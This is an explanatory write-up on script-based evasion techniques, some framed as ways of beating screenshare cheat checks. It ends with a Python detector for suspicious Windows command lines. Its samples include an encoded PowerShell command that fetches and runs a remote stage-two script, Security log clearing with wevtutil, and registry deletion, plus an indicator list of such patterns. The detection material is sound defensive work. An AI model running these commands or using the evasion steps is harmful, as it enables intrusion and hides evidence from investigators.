Mechanisms of Evasion

  • Living-off-the-Land (LotL): Scripts run using trusted, built-in Windows interpreters (powershell.exe, cmd.exe, cscript.exe/wscript.exe for VBS, mshta.exe for HTA) or commonly installed ones (python.exe, AutoIt3.exe). Since the interpreters are legitimate, their execution is less likely to be immediately flagged by basic AV compared to a completely unknown .exe.

  • Fileless Execution (PowerShell Focus): PowerShell is particularly potent because it allows code (cmdlets, scripts) to be downloaded and executed directly in memory without ever touching the disk. Encoded commands can be passed via the command line (powershell.exe -EncodedCommand ...), minimizing disk artifacts.

  • Obfuscation: Scripts are text-based and easily obfuscated, which hinders static analysis (reading the script code) and simple string searches. Techniques include:

    • Encoding (Base64 is common in PowerShell).

    • Character substitution/concatenation.

    • Breaking logic into many small, confusingly named functions.

    • Adding junk code or comments.

  • Automation of Malicious Tasks: Scripts excel at automating sequences of actions relevant to bypassing screenshares, such as:

    • Disabling security services or specific logging mechanisms (e.g., stopping SysMain, clearing Event Logs via wevtutil).

    • Deleting specific files or artifacts (e.g., Prefetch files, browser history, cheat logs, registry keys via reg delete).

    • Modifying system settings (e.g., changing file attributes, registry policies).

    • Downloading and executing secondary payloads (e.g., using PowerShell's Invoke-WebRequest or certutil.exe called from a script).

  • Interaction with System Components: Scripts can directly interact with powerful system interfaces:

    • Windows APIs (via PowerShell's .NET integration or specific COM objects).

    • Windows Management Instrumentation (WMI) for system queries, configuration changes, or remote execution.

    • COM Objects for interacting with various applications and system components.

    • .NET Framework for complex operations, memory manipulation, or loading assemblies.

  • HTA Exploitation: HTML Applications (.hta files executed by mshta.exe) run embedded scripts (VBScript, JScript) outside the browser sandbox, often with higher privileges, allowing direct system interaction. They can be used as loaders delivered via web or email.

  • AutoIt Automation: AutoIt is a legitimate scripting language for Windows GUI automation. Attackers misuse it to create sophisticated macros, autoclickers, or bots that simulate user input. Compiled AutoIt scripts (.exe) can sometimes be harder to reverse-engineer than plain text scripts.
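The command-line patterns listed above (encoded PowerShell, in-memory download/execute, log clearing via wevtutil, artifact deletion via reg delete) are what a defender looks for in process-creation telemetry. The following detector is an added example, not code from the original page: it decodes -EncodedCommand payloads and matches indicators against both the raw command line and the decoded script. The sample command lines, the example.invalid URL and the indicator list are constructed here for illustration.

```python
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# capture the Base64 argument that follows the common spellings.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Case-insensitive substrings mirroring the behaviours in the list above (constructed
# set): in-memory download/execute, log clearing, artifact deletion, service stops,
# hidden windows. Substring matching is deliberately simple; tune for your telemetry.
INDICATORS = [
    "invoke-expression", "iex ", "invoke-webrequest", "downloadstring",
    "frombase64string", "wevtutil cl", "wevtutil.exe cl", "reg delete",
    "reg.exe delete", "stop-service", "sc stop", "sc.exe stop",
    "-w hidden", "-windowstyle hidden",
]


def decode_encoded_command(b64: str):
    """-EncodedCommand carries Base64 over UTF-16LE script text; None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(cmdline: str) -> dict:
    """Decode an embedded encoded command (if any) and match indicators against
    both the raw command line and the decoded script text."""
    match = ENCODED_RE.search(cmdline)
    decoded = decode_encoded_command(match.group(1)) if match else None
    text = " ".join((cmdline + " " + (decoded or "")).split()).lower()  # collapse whitespace
    hits = [ind for ind in INDICATORS if ind in text]
    if match and decoded is None:
        hits.append("undecodable-encodedcommand")  # malformed Base64/UTF-16LE is itself notable
    return {"encoded": match is not None, "decoded": decoded, "indicators": hits}


def triage(cmdlines):
    """Return (cmdline, result) pairs for review; encoded commands are surfaced even
    without indicators, since legitimate use outside known admin tooling is rare."""
    findings = []
    for cmd in cmdlines:
        result = analyze(cmd)
        if result["indicators"] or result["encoded"]:
            findings.append((cmd, result))
    return findings


# Constructed sample process command lines (what Sysmon Event ID 1 / Security 4688 record).
_SCRIPT = 'Invoke-Expression (Invoke-WebRequest "http://example.invalid/stage2.ps1" -UseBasicParsing).Content'
_B64 = base64.b64encode(_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -W Hidden -EncodedCommand {_B64}",
    "wevtutil.exe cl Security",
    'reg.exe delete "HKCU\\Software\\ExampleTool" /f',
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    for cmd, result in triage(SAMPLE_COMMAND_LINES):
        print(result["indicators"], "<-", cmd[:60])
```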
